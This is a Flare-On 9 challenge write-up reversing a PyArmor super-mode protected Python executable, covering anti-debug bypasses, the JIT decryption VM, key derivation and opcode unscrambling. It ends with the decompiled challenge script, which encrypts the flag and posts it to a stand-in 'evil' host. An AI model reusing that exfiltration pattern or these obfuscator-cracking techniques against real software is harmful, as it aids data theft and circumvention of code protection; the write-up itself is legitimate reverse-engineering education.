Flare-On 9 - #11 The challenge that shall not be named.

Running the program waits a few seconds before closing and doing what seems like nothing. Guess we need to go into the code.

The executable is a pyinstaller. We can extract it with the pyinstxtractor.py script. There’s an 11.pyc script which we can sort of decompile with pycdc. But we open it up to find this:

from pytransform import pyarmor
pyarmor(__name__, __file__, b'PYARMOR\x00\x00\x03\x07\x00B\r\r\n\t0\xe0\x02\x01...', 2)

This is “obfuscated” by pyarmor. Pyarmor uses a native library (pytransform.pyd) to decode and run the script, so this is more of a native issue than a Python one. I have done pyarmor before, but usually the native library is called _pytransform.dll, not pytransform.pyd. It turns out the pyd is used if the script is compiled with pyarmor “super mode”.

Very very easy solution

The easy solution is really dumb. Pyinstxtractor extracts the pyz “zip” into a separate folder, even though it should extract in the same directory for the code to work right. As a result, trying to call 11.pyc with normal Python will throw an exception, complaining about the crypt library not working right.

You can make your own crypt file and insert code there, printing the data to be encrypted and get the flag that way. I didn’t do this method, only the next one, but this was apparently the solve method for this challenge.

Very easy solution

The next solution to pyarmor is to patch the Python interpreter to dump marshals on every frame. In other words, every Python function that gets called should have its binary representation written to file. Then, we can grep for @flare-on.com and hopefully find something.

Normally this works pretty well for normal pyarmor. The code is encrypted but not obfuscated. So you can let pyarmor do the decryption, then when it calls the decrypted Python code, dump that to file. Super mode on the other hand is slightly immune to this. No spoilers yet, but it just doesn’t work. The code still seems to be encrypted when we reach the 11.pyc code.

However, seeing the stack trace that I talked about in the very very easy solution, I had an idea. Since the backtrace shows that 11.pyc is still running (and still decrypted?), what if we marshal dump all the functions on the call stack?

The main 11.pyc code is still encrypted, but the funny thing is that the PYARMOR string has been decrypted. The strings are in plain text, including the flag. Challenge finished.

Debugging solution

The debugging solution is to crack open pytransform.pyd and see where it reads decrypts the code.

Anti-debug

First thing of note is that pyarmor has anti-debug protection. Not good protection, just protection. If you’re curious if a program almost certainly has anti-debug protection, search for IsDebuggerPresent in the imports. Most competent programs will hide the import somehow, but ones like pyarmor make it super obvious.

Go to the IsDebuggerPresent import and back into the first x-ref. There are three checks here. The first is the IsDebuggerPresent check. If this fails, the program exits. The second is the hardware breakpoint unsetting function. This one always succeeds, so the condition here is a little useless. The third one sets the hide thread from debugger flag. When this is called while debugging with IDA, the program can’t be stopped or paused and basically is only fixed by restarting.

The solution to this is of course set a breakpoint to jump to the return false*** statement (all checks pass). ScyllaHide works for the IsDebuggerPresent check, but hardware breakpoints will still unset and the thread will still be marked as hidden from debugger, so the jump is really needed here.

You can set a breakpoint somewhere and find that it’s still exiting. Didn’t we patch that already?

JIT “protection”

The second part is the JIT code (you can read up about it here on the pyarmor wiki because the developer loves telling you about all the protections he uses.) I won’t go into it much yet, but the JIT protection is some code generated at runtime that decrypts inputs into a key and IV buffer. That code also calls IsDebuggerPresent, clock, and unset hardware breakpoints.

If you want a dumb solution, just install ScyllaHide. It will stop the IsDebuggerPresent check. The clock check (making sure the code runs fast enough, something that wouldn’t happen if debugging the JIT) doesn’t matter if we aren’t debugging the JIT.

You can also add breakpoints to skip the whole IsDebuggerPresent and remove hardware breakpoints functions if you want, or you can make the pointers in the list point to a xor eax, eax; return; function (there are a few of these if you use ropgadget.)

The rest of the JIT protection we don’t have to worry about since the code will do all the decryption for us and we can go to where it’s decrypted.

Where does the decrypted code go?

Magic numbers/strings are great. We know that the encrypted code starts with PYARMOR. If the code checks for that string at the beginning, we can look for that string in the code to see where it’s being checked. Chances are it’s near the code that decrypts it.

                     PTR_s_PYARMOR_6d6835c0                          XREF[1]:     FUN_6d605c30:6d605d5d (R)   
6d6835c0 5b 47 6e 6d 00 00 00 00    addr       s_PYARMOR_6d6e475b                               = "PYARMOR"

Yep, looks like there’s a function using that string. Let’s see what it does with it.

...
else {
  pyarmorData = (char *)PyBytes_AsString(local_20[0]);
  _Str2 = PTR_s_PYARMOR_6d6835c0;
  local_30 = pyarmorData;
  if (pyarmorData != (char *)0x0) {
    _MaxCount = strlen(PTR_s_PYARMOR_6d6835c0);
    iVar3 = strncmp(pyarmorData,_Str2,_MaxCount);
    if (iVar3 == 0) {
      uVar1 = *(uint *)(pyarmorData + 0x38);
      if (uVar1 != 0) {
        uVar2 = *(uint *)(pyarmorData + 8);
        while ((uVar2 & 0xffff00) != 0x70300) {
          pyarmorData = pyarmorData + uVar1;
          uVar1 = *(uint *)(pyarmorData + 0x38);
          local_30 = pyarmorData;
          if (uVar1 == 0) break;
          uVar2 = *(uint *)(pyarmorData + 8);
        }
      }
      IVar4 = doChecksAndDecryptPYARMOR_6d6052e0((longlong)pyarmorData,pyarmorDataSize,local_38,local_44);
      if (IVar4 == WRONG_PY_RUNTIME_VER) {
        IVar4 = NONE;
        PyErr_SetString(*(undefined8 *)PyExc_RuntimeError_exref,"The python version in runtime is different from the build time");
      }
      else if (IVar4 == UNSUPPORTED_MARSHAL_TYPE) {
        IVar4 = NONE;
        PyErr_SetString(*(undefined8 *)PyExc_RuntimeError_exref,"Unsupport marshal type");
      }
      ... more checks here

It’s pretty obvious since my names are already annotated, but yes, there’s the function in here that does the decryption. This is the one of the only non-python/stdlib function call in this function, so it’s not hard to find.

You can step through the code with a debugger to see where it goes. We find out it goes here.

  lVar10 = pyarmorData + (ulonglong)*(uint *)(pyarmorData + 0x1c);
  if (param_4 == 2) {
    iVar8 = *(int *)(pyarmorData + 0x2c);
    *(uint *)(&stack0x00000030 + lVar6) = *(uint *)(pyarmorData + 0x28) ^ (uint)DAT_6d7091c6;
    puVar7 = &stack0x00000050 + lVar6;
    iVar3 = *(int *)(pyarmorData + 0x30);
    *(uint *)(&stack0x00000034 + lVar6) = iVar8 - 0x3b22U ^ (uint)((ulonglong)DAT_6d7091c6 >> 0x20);
    iVar8 = *(int *)(pyarmorData + 0x34);
    *(uint *)(&stack0x00000038 + lVar6) = iVar3 + 0x802fU ^ (uint)_DAT_6d7091ce;
    *(uint *)(&stack0x0000003c + lVar6) = iVar8 + 0x251aU ^ (uint)((ulonglong)_DAT_6d7091ce >> 0x20);
    *(undefined8 *)((longlong)&uStack72 + lVar6) = 0x6d6058e0;
    uVar9 = FUN_6d60e410((longlong)puVar7,DAT_6d709204,(longlong)(&stack0x00000030 + lVar6),0x10);
    if ((int)uVar9 != 0) {
      return RESTORE_MODULE_FAILED;
    }
    *(undefined8 *)((longlong)&uStack72 + lVar6) = 0x6d605b52;
    uVar9 = FUN_6d60dd70((longlong)puVar7,(ulonglong *)(pyarmorData + 0x28),0xc);
    if ((int)uVar9 != 0) {
      return RESTORE_MODULE_FAILED;
    }
    uVar1 = *(uint *)(pyarmorData + 0x20);
    *(undefined4 *)(&stack0xffffffffffffffe0 + lVar6) = 1;
    *(undefined8 *)((longlong)&uStack72 + lVar6) = 0x6d605b74;
    uVar9 = FUN_6d60e8d0((longlong)puVar7,lVar10,uVar1,lVar10,*(int *)(&stack0xffffffffffffffe0 + lVar6));
    if ((int)uVar9 != 0) {
      return RESTORE_MODULE_FAILED;
    }
    uVar1 = *(uint *)(pyarmorData + 0x20);
    uVar2 = *(uint *)(pyarmorData + 0x24);
    iVar8 = *(int *)(pyarmorData + 0x14);
    *(undefined8 *)((longlong)&uStack72 + lVar6) = 0x6d605b90;
    lVar10 = FUN_6d602930(iVar8,uVar2,lVar10,(ulonglong)uVar1);
  }

Most likely param_4 is the fourth argument of the pyarmor() call. In any case, we see some sussy xoring which means we found the decryption code.

I didn’t annotate these function calls but looking at the strings makes it really obvious.

If we set a breakpoint after it does the gcm decryption, we get the decrypted string in memory.

Hard solution

No one should go this far to solve a simple CTF challenge. The debugging method is probably the most work you should do.

But curiosity got to me. Is there a way to decode this statically, and fast? Of course.

Embedded files

The first step is to get the files embedded in the pyd file. The Python portion of pyarmor’s packer is available on Github. If you look, it searches for a magic number, 60-70-00-0F. Surprisingly, pyarmor does not overwrite this value, making it super easy to find in the pyd file.

6d6835e4 60              ??         60h    `
6d6835e5 70              ??         70h    p
6d6835e6 00              ??         00h
6d6835e7 0f              ??         0Fh
6d6835e8 00              ??         00h
6d6835e9 10              ??         10h
6d6835ea 00              ??         00h
6d6835eb 00              ??         00h
                   DAT_6d6835ec                                    XREF[1]:     readEncryptedResource_6d602220:6
6d6835ec 00 00 00 00    undefined4 00000000h
                   DAT_6d6835f0                                    XREF[1]:     readEncryptedResource_6d602220:6
6d6835f0 05 01 00 00    undefined4 00000105h
                   DAT_6d6835f4                                    XREF[1]:     readEncryptedResource_6d602220:6
6d6835f4 05 01 00 00    undefined4 00000105h
                   DAT_6d6835f8                                    XREF[1]:     readEncryptedResource_6d602220:6
6d6835f8 0e 01 00 00    undefined4 0000010Eh
                   DAT_6d6835fc                                    XREF[1]:     readEncryptedResource_6d602220:6
6d6835fc 13 02 00 00    undefined4 00000213h
                   DAT_6d683600                                    XREF[1]:     readEncryptedResource_6d602220:6
6d683600 9c 01 00 00    undefined4 0000019Ch
                   DAT_6d683604                                    XREF[1]:     readEncryptedResource_6d602220:6
6d683604 83              ??         83h
6d683605 24              ??         24h    $
6d683606 b0              ??         B0h
6d683607 47              ??         47h    G
...

You can take a look at the code but it’s pretty simple. 6d6835ec starts the table. The first item is pyshield.lic’s offset from the data (6d683604+0), and the second item is the length (0x105). The third and fourth are product.key’s and the last few are for license.lic. In my opinion, these names are a bit misleading. They are just used for decryption.

Decoding the JIT “protection”

Once again, the pyarmor documentation gives away how the JIT works. It uses GNU lightning but with basically different opcodes. The opcodes for GNU lightning are different for each version, but a quick look at the constants shows pyarmor uses the third (2.1.2) latest version of GNU lightning. From here, we can reverse every pyarmor JIT bytecode to a GNU lightning one.

# not directly gnu lightning instructions
s_init = 0x01 # s_init <local_count> # init vm. local_count includes the 3 required arguments
s_execute = 0x02
s_ld_ptr = 0x03 # s_ld_ptr <dst> <ptr> # load ptr from a list (see ptr_list) and store into dst
s_stxi_local = 0x04 # s_stxi_local <local_idx> <src> # store from register src to local_idx
s_ldxi_local = 0x05 # s_ldxi_local <local_idx> <dst> # load argument from local_idx to register dst
s_call_sysfun = 0x0e # s_call_sysfun <fun_idx> # call system function from a list (see fun_list)
s_finishi_sysfun = 0x0f # s_finishi_sysfun <fun_idx>
# gnu lightning instructions
prepare = 0x10 # prepare next finish call
pushargi = 0x11 # pushargi {imm} # push imm
pushargr = 0x12 # pushargr <reg> # push reg
reti = 0x14 # reti <imm> # reti
retr = 0x15 # retr <reg> # retr
retval_l = 0x16 # retval_l <reg> # store return value from call into reg
movr = 0x20 # movr <dst> <src> # move src value into dst
movi = 0x21 # movi <dst> {imm} # move imm into dst
ldr_l = 0x30 # ldr_l <dst> <addr> # load value at address register addr into register dst
ldr_ui = 0x31 # ldr_ui <dst> <addr> # load value at address register addr into register dst
ldxr_uc = 0x32 # ldxr_uc <dst> <addr_off> # load value at (address register+off register) addr into register dst
str_l = 0x40 # str_l <addr> <src> # store value of src into address register addr
str_i = 0x41 # str_i <addr> <src> # store value of src into address register addr
stxr_c = 0x42 # stxr_c <addr> <src_off> # store value of src into (address register+off register) addr
addr = 0x100 # addr <dst> <reg> # dst += reg
addi = 0x101 # addi <dst> {imm} # dst += imm
subr = 0x110 # subr <dst> <reg> # dst -= reg
subi = 0x111 # subi <dst> {imm} # dst -= imm
mulr = 0x120 # mulr <dst> <reg> # dst *= reg
muli = 0x121 # muli <dst> {imm} # dst *= imm
divr = 0x130 # divr <dst> <reg> # dst /= reg
divi = 0x131 # divi <dst> {imm} # dst /= imm
remr = 0x140 # remr <dst> <reg> # dst %= reg
remi = 0x141 # remi <dst> {imm} # dst %= imm
xorr = 0x150 # xorr <dst> <reg> # dst ^= reg
xori = 0x151 # xori <dst> {imm} # dst ^= imm
lshr = 0x160 # lshr <dst> <reg> # dst <<= reg
lshi = 0x161 # lshi <dst> {imm} # dst <<= imm
label = 0x200 # label <label_idx> # store label at index
forward = 0x201 # forward <label_idx> # store forward label at index
link = 0x203 # link <label_idx> # store link label at index
patch = 0x204 # patch <label_idx> # apply patch
patch_at = 0x205 # patch_at <cond> <label_idx> # apply patch 
bltr = 0x300 # bltr <label_idx> <xy_registers> # branch if less than (reg[b & 0xf] < reg[b >> 4])
blti = 0x301 # blti <label_idx> <x_register> {y_value} # branch if less than (reg[b] < i)
bgtr = 0x310 # bgtr <label_idx> <xy_registers> # branch if greater than (reg[b & 0xf] > reg[b >> 4])
bgti = 0x311 # bgti <label_idx> <x_register> {y_value} # branch if greater than (reg[b] > i)
beqr = 0x320 # beqr <label_idx> <xy_registers> # branch if equal to (reg[b & 0xf] == reg[b >> 4])
beqi = 0x321 # beqi <label_idx> <x_register> {y_value} # branch if equal to, sign ignored (abs(reg[b]) == abs(i))

There’s a lot of instructions but not many are used. A few things to point out real quick. There are two lists, ptr_list and fun_list, as well as a few arguments passed into the JIT function.

fun_list:
  [0] (clock) - get the current time. the code checks the previous clock time and if it's 1000ms off, it fails.
  [1] (IsDebuggerPresent) - fail if debugger attached.
  [2] (UnsetHwBreakpoints) - unset breakpoints. always passes.

ptr_list:
  [0] - vm_start_address - pointer to the beginning of the JIT function (the c++ one)
  [1] - input_address - pointer to the input file (either pyshield.lic or product.key)
  [2] - input_address_len - length of file
  [3] - output_key_address - pointer to key output
  [4] - output_iv_address - pointer to iv output

arguments:
  [0] - next_function_address - pointer to beginning of next encrypted code block. we'll get to this later.
  [1] - end_code_block_address - pointer to end of last encrypted code block.
  [2] - last_clock_time - pointer to memory that stores the last clock() result time.

The way the JIT code works is relatively simple. There are a few hundred encrypted blocks (iirc). The code generally checks if the current and previous clock times are close enough together and if so, runs a little bit of code. Sometimes it can be nothing and sometimes it can be decrypting a part of the key and iv. It then ends with a bit of code to decrypt the next encrypted block. This goes on until there are no more blocks to decrypt.

Besides the clock and debugger checks, there’s also a check on a big portion of the pytransform.pyd in memory. If it doesn’t match what is basically a CRC, it exits the program, or at least it’s supposed to. I didn’t check if it was in every section, but many of them look like this:

00000034 | 00010203 | link 0x01 // link label[1]
00000038 | 00040003 | s_mov_func_inf 0x04 0x00 // r4 = natarg0, start of JIT function
0000003c | 00040111 | subi 0x04 {0x527f0} // r4 -= 337904 // 0x6D601000
00000044 | 04050020 | movr 0x05 0x04 // r5 = r4
00000048 | 00050101 | addi 0x05 {0x81500} // r5 += 529664 // 0x6D682500
00000050 | 00030021 | movi 0x03 {0x00} // r3 = 0
00000058 | 00030200 | label 0x03 // label[3]
0000005c | 04000031 | ldr_ui 0x00 0x04 // r0 = *r4 // uint
00000060 | 00030100 | addr 0x03 0x00 // r3 += r0
00000064 | 00040101 | addi 0x04 {0x04} // r4 += 4
0000006c | 54030300 | bltr 0x03 0x04 0x05 // c3 = r4 < r5
00000070 | 03030205 | patch_at 0x03 0x03 // if c3 -> goto label[3]
00000074 | 00070201 | forward 0x07 // forward 7
00000078 | 00040003 | s_mov_func_inf 0x04 0x00 // r4 = natarg0
0000007c | 00030021 | movi 0x03 {0xc99dfd8} // r3 = 211410904
00000084 | 00070203 | link 0x07 // link label[7]
00000088 | 00040201 | forward 0x04 // forward 4
0000008c | 03040321 | beqi 0x04 0x03 0x00 {0xc99dfd8} // c4 = r3 == 211410904
00000094 | 04040205 | patch_at 0x04 0x04 // if c4 -> goto label[4]
00000098 | 00020014 | reti 0x02 // return 2

The code adds up a bunch of bytes (as ints) into r3. But before it checks if it equals the right number, it sets r3 to the correct value, skipping the check… This could’ve potentially been good software breakpoint protection on small, specific functions, but instead it is skipped entirely.

For the most part though, you don’t need to know what what the JIT is doing internally. We know it decrypts things into keys and IVs because we can see the values returned from the JIT used in things like AES decryption. So just implementing the JIT is good enough (the code for this is in the pyarmorvm.py file in the bone density repo.)

However, for the Python emulator I wrote, this implementation takes around 10 seconds, even when run from pypy and way longer when run in regular Python. Let’s say we want speed and efficency and want to rewrite the JIT code in Python (not just an interpreter).

KEY_OPS = [
    # base off, off, add off, is add?, xor
    [25,0,186,False,228],
    [25,1,121,True,106],
    [25,2,164,True,129],
	... 47 more lines
]

IV_OPS = [
    # base off, off, add off, is add?, xor
    [9,0,20,False,55],
    [9,1,38,False,157],
    [9,2,107,True,53],
	... 1797 more lines
]

def decode_key_and_iv(inp):
    inp_len = len(inp)
    key = [0]*80
    iv = [0]*48

    # ####################
    for i in range(24):
        key[i] = inp[((i * 4) + 16) % inp_len]

    for i in range(8):
        iv[i] = inp[((i * 8) + 24) % inp_len]
    
    # ####################
    for i in range(24):
        key[i] ^= (((23 - i) ** 2) + 3) & 0xff

    for i in range(8):
        iv[i] ^= (((7 - i) ** 2) + 3) & 0xff
    
    # ####################
    for i in range(8):
        iv[i + 9] = inp[(i * 5 + 28) % inp_len]

    for i in range(8):
        iv[i + 18] = inp[(i * 7 + 15) % inp_len]
    
    # ####################
    for item in KEY_OPS:
        base_off = item[0]
        off = item[1]
        add_off = item[2]
        is_add = item[3]
        xor = item[4]

        a = inp[(off + add_off) % inp_len]
        b = inp[off] # was this a mistake? in any case, it lets us make KEY_OPS much shorter
        if is_add:
            key[base_off + off] = ((a + b) & 0xff) ^ xor
        else:
            key[base_off + off] = ((a - b) & 0xff) ^ xor

    # ####################
    for item in IV_OPS:
        base_off = item[0]
        off = item[1]
        add_off = item[2]
        is_add = item[3]
        xor = item[4]

        a = inp[(off + add_off) % inp_len]
        b = iv[off + base_off]
        if is_add:
            iv[base_off + off] = ((a + b) & 0xff) ^ xor
        else:
            iv[base_off + off] = ((a - b) & 0xff) ^ xor
    
    # ####################
    for i in range(24):
        key[i + 25] ^= (((23 - i) ** 2) + 3) & 0xff

    for i in range(8):
        iv[i + 9] ^= (((7 - i) ** 2) + 3) & 0xff
    
    # ####################
    for i in range(24):
        key[i + 50] ^= (((23 - i) ** 2) + 3) & 0xff

    for i in range(8):
        iv[i + 18] ^= (((7 - i) ** 2) + 3) & 0xff
    
    return (key, iv)

The main thing to point out here is the part using KEY_OPS and IV_OPS. In the JIT code, it’s just a lot of code in many different encrypted blocks, not just a few for loops. The funny thing about the key version is that it doesn’t use the previous results of the key, meaning it overwrites the last iteration of the “loop”. For the key part then, I can just use the last results of the function, hence why the KEY_OPS array only has 50 items. The IV part was done correctly, and I had to parse all 1800 operations to decode the IV correctly.

With that done, we can finally get some decrypted keys and ivs. The code runs the JIT code to get a key and IV from pyshield.lic, then uses those to decrypt product.key’s key and IV. Most of the data decryption happens with product.key’s key and IV.

Next is to decrypt the data. We parse the pyc for the PYARMOR bytes, then use AES GCM to decrypt it. If we only wanted the flag, we could stop here because this gives us the decrypted PYARMOR string we saw in the easy method.

But what if we want to go further and get a full decompilation?

Remember how in the easy method, the code looked encrypted? We can try to disassemble the marshal we get and see the same thing.

>>> import marshal
>>> import dis
>>> m = marshal.load(open("11.pyc.marshal","rb"))
>>> m
(<code object <module> at 0x000001E2B9CBFF60, file "<frozen 11>", line 1>, (0, None, 'http://www.evil.flare-on.com', b'Pyth0n_Prot3ction_tuRn3d_Up_t0_11@flare-on.com', b'PyArmor_Pr0tecteth_My_K3y', ('url', 'flag', 'key'), 'key', 'flag', 'url', ('data',)))
>>> dis.dis(m[0])
  1           0 LOAD_GLOBAL             14 (__armor_wrap__)
              2 CALL_FUNCTION            0
              4 NOP
              6 RETURN_VALUE

  2           8 NOP
        >>   10 NOP
             12 <0>
             14 <0>

  3          16 CALL_METHOD            117
             18 <48>
             20 <187>                   55
             22 BINARY_RSHIFT
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "C:\Users\nopenope\Documents\flareon9\3.7\cpython-3.7\lib\dis.py", line 70, in dis
    _disassemble_recursive(x, file=file, depth=depth)
  File "C:\Users\nopenope\Documents\flareon9\3.7\cpython-3.7\lib\dis.py", line 360, in _disassemble_recursive
    disassemble(co, file=file)
  File "C:\Users\nopenope\Documents\flareon9\3.7\cpython-3.7\lib\dis.py", line 357, in disassemble
    co.co_consts, cell_names, linestarts, file=file)
  File "C:\Users\nopenope\Documents\flareon9\3.7\cpython-3.7\lib\dis.py", line 390, in _disassemble_bytes
    line_offset=line_offset):
  File "C:\Users\nopenope\Documents\flareon9\3.7\cpython-3.7\lib\dis.py", line 330, in _get_instructions_bytes
    argval, argrepr = _get_name_info(arg, names)
  File "C:\Users\nopenope\Documents\flareon9\3.7\cpython-3.7\lib\dis.py", line 294, in _get_name_info
    argval = name_list[name_index]
IndexError: tuple index out of range
>>>

The trick is that code calls __armor_wrap__ first thing which decrypts the code. Now in normal pyarmor, I believe it decrypts it inline, continues as usual, and when hitting a __armor_end__ function, re-encrypts the data. In super mode, that’s not the case.

Let’s take a look at the __armor_wrap__ code (just search for that string and the pointer is right underneath.

ppvVar1 = ppvVar3 + 2;
frame->f_stacktop = ppvVar1;
frame->f_valuestack = ppvVar1;
AVar5 = unwrapper_6d604740(frame,(longlong)code,codeBytesPlus16,codeBytesSize);
frame->f_valuestack = ppvVar3;
if (AVar5 == INVALID_LICENSE) {
  PyErr_SetString(*(undefined8 *)PyExc_RuntimeError_exref,"Invalid license");
  return 0;
}
if (AVar5 == CANT_CALL_PLAIN_SCRIPT) {
  PyErr_SetString(*(undefined8 *)PyExc_RuntimeError_exref,"This function could not be called from the plain script");
  return 0;
}
...

Very similar situation to the PYARMOR decryption code. Here’s the relevant code in unwrapper.

else {
  if ((uVar6 & 0x40000000) != 0) {
    *(ulonglong *)((longlong)&uStackX16 + lVar4) = CONCAT44(DAT_6d7091d2._4_4_,(uint)DAT_6d7091d2);
    *(ulonglong *)((longlong)&uStackX24 + lVar4) = CONCAT44(DAT_6d7091da._4_4_,(uint)DAT_6d7091da);
    *(undefined8 *)((longlong)&uStackX32 + lVar4) = DAT_6d7091e2;
    *(uint *)((longlong)&uStackX16 + lVar4) = *(uint *)((longlong)&uStackX16 + lVar4) ^ *puVar16;
    puVar11 = (uint *)((longlong)&uStackX16 + lVar4 + 4);
    *puVar11 = *puVar11 ^ puVar16[1] - 0xb35;
    *(uint *)((longlong)&uStackX24 + lVar4) = *(uint *)((longlong)&uStackX24 + lVar4) ^ puVar16[2] + 0xd6ae;
    puVar11 = (uint *)((longlong)&uStackX24 + lVar4 + 4);
    *puVar11 = *puVar11 ^ puVar16[3] + 0xe9c3;
    puVar11 = (uint *)((longlong)&uStackX16 + lVar4);
    puVar15 = codeBytesPlus16;
    while ((uint *)((longlong)codeBytesPlus16 + (codeBytesSize & 0xfffffffc)) != puVar15) {
      puVar1 = puVar11 + 1;
      puVar14 = puVar15 + 1;
      *puVar15 = (*puVar15 ^ *puVar11) + 0xdd15;
      puVar11 = puVar1;
      puVar15 = puVar14;
      if (puVar1 == (uint *)(&stack0x00000028 + lVar4)) {
        puVar11 = (uint *)((longlong)&uStackX16 + lVar4);
      }
    }
    uVar6 = *puVar12;
    goto LAB_6d604875;
  }
  // there's code here, but it's not used in this case
}
*(uint *)(code + 0x20) = *(uint *)(code + 0x20) & 0xf7ffffff | 0x40000000;
uVar6 = *puVar12;
LAB_6d604875:
*puVar12 = uVar6 + 1;
*(undefined8 *)((longlong)&uStack72 + lVar4) = 0x6d604888;
AVar8 = pythonCeval_6d67a640(frame);
// the same code to reencrypt it happens down here

The code inside the wrap is decrypted with more XOR stuff from portions of the key array, and then it goes into the pythonCodeExe function. This function is a copy of Python’s bytecode interpreter but with a catch: the function was compiled with all the opcodes swapped around. This could actually be a good idea if it actually worked, but it doesn’t.

There’s a value (which I will call zoombie, it was around Halloween and I needed a dumb variable name) that comes from a few bytes of the key and IV output of product.key. There’s also a table of numbers 0-255 (I call the scramble table) in a seemingly random order. The scramble table is scrambled again using the zoombie value, then the jump table for the Python interpreter is scrambled with that yet again scrambled table. Lots of scrambling means high security right?

What I found by playing around with expected values and encrypted values were that you could get all of the original opcodes from the original scramble table and the scrambled scramble table alone.

Here’s the full unscramble function:

opcode_mixer = [
	0x00, 0x50, 0x3D, 0x41, 0x03, 0x18, 0x3E, 0x46, 0x26, 0x16, 0x1B, 0x4E,
	0x27, 0x30, 0x53, 0x2E, 0x04, 0x38, 0x4B, 0x0A, 0x05, 0x06, 0x43, 0x2C,
	0x4A, 0x2D, 0x12, 0x07, 0x1C, 0x13, 0x1E, 0x1F, 0x20, 0x21, 0x3A, 0x37,
	0x19, 0x36, 0x08, 0x45, 0x28, 0x29, 0x2A, 0x2B, 0x56, 0x09, 0x2F, 0x25,
	0x42, 0x0C, 0x32, 0x33, 0x34, 0x35, 0x0B, 0x0D, 0x4C, 0x3F, 0x55, 0x11,
	0x0E, 0x02, 0x10, 0x14, 0x47, 0x39, 0x54, 0x31, 0x15, 0x17, 0x1A, 0x40,
	0x48, 0x49, 0x4F, 0x1D, 0x3B, 0x0F, 0x23, 0x24, 0x4D, 0x51, 0x52, 0x3C,
	0x44, 0x59, 0x01, 0x57, 0x58, 0x22, 0x86, 0x99, 0x5C, 0x5D, 0x6B, 0xE7,
	0xC0, 0xA1, 0xC4, 0x65, 0x64, 0xF1, 0xEF, 0xA3, 0xD6, 0xE5, 0xF5, 0xDA,
	0xD2, 0xD4, 0xE3, 0x9B, 0xCE, 0x71, 0x72, 0x73, 0x74, 0xA4, 0xDB, 0x66,
	0x78, 0x79, 0x7A, 0xEE, 0x7C, 0x7D, 0x9D, 0xB2, 0x8B, 0xCC, 0xEA, 0x83,
	0x5E, 0xA5, 0xD7, 0xE0, 0xCD, 0x89, 0x5B, 0xAC, 0x8C, 0x8D, 0x8E, 0x8F,
	0xBF, 0x92, 0x75, 0x82, 0xB6, 0x95, 0xED, 0xF0, 0xC5, 0x6D, 0x9A, 0xC6,
	0x60, 0x70, 0x9E, 0xBE, 0x61, 0xA0, 0xB9, 0x9F, 0xDE, 0xB3, 0x8A, 0xC9,
	0xBD, 0xA9, 0x88, 0x67, 0xF9, 0xD9, 0x62, 0x90, 0xE9, 0xC3, 0xF8, 0xCB,
	0x63, 0xB1, 0x84, 0xC7, 0xD5, 0x98, 0x80, 0xE6, 0x9C, 0xAE, 0xF2, 0xAB,
	0xDD, 0xBA, 0xEC, 0xB5, 0xE1, 0x6F, 0x68, 0xB0, 0xA7, 0x69, 0xD0, 0xA8,
	0xDF, 0xAA, 0x6A, 0xEB, 0x7B, 0xBC, 0xB8, 0x85, 0xB7, 0xF7, 0x6C, 0xD3,
	0xF6, 0x6E, 0xA6, 0xAD, 0x97, 0xCF, 0xE2, 0xC8, 0xF4, 0x5F, 0x77, 0x7E,
	0xD8, 0x91, 0xBB, 0xF3, 0xAF, 0x7F, 0x81, 0xA2, 0x87, 0xCA, 0xE8, 0xC1,
	0x93, 0x76, 0x96, 0xE4, 0xB4, 0xC2, 0xD1, 0xDC, 0xFA, 0x5A, 0x94, 0xFB,
	0xFC, 0xFD, 0xFE, 0xFF
]

def unscramble_opcode_mixer(zoombie):
    new_mixer = opcode_mixer[:]
    for i in range(90):
        m = new_mixer[i]
        if m != i:
            mix_idx = zoombie + i - ((zoombie + i) // 90 * 90)
            if new_mixer[mix_idx] != mix_idx:
                new_mixer[i] = new_mixer[mix_idx]
                new_mixer[mix_idx] = m
    
    for i in range(90, 252):
        m = new_mixer[i]
        zp = zoombie + i
        if m != i:
            mix_idx = (zp % 162 + 90) % 256
            if new_mixer[mix_idx] != mix_idx:
                new_mixer[i] = new_mixer[mix_idx]
                new_mixer[mix_idx] = m
    
    return new_mixer

def correct_py_bytecode(new_mixer, code):
    for i in range(0, len(code), 2):
        # need to do index on mix table since we're trying to reverse the conversion
        code[i] = opcode_mixer.index(new_mixer.index(code[i]))

Now we can run pycdc on it. Decompyle3 complained, so pycdc was the only option. Not the greatest output (I cleaned it up a bit) but it’s readable enough.

import crypt
import base64
import requests

config = {
    'url': 'http://www.evil.flare-on.com',
    'flag': b'Pyth0n_Prot3ction_tuRn3d_Up_t0_11@flare-on.com',
    'key': b'PyArmor_Pr0tecteth_My_K3y'
}

cipher = crypt.ARC4(config['key'])
flag = base64.b64encode(cipher.encrypt(config['flag']))

try:
    requests.post(config['url'], data = { 'flag': flag })
except requests.exceptions.RequestException:
    e = None
    try:
        pass
    finally:
        e = None
        del e
except Exception:
    e = None
    try:
        pass
    finally:
        e = None
        del e

The source code: https://github.com/nesrak1/bonedensity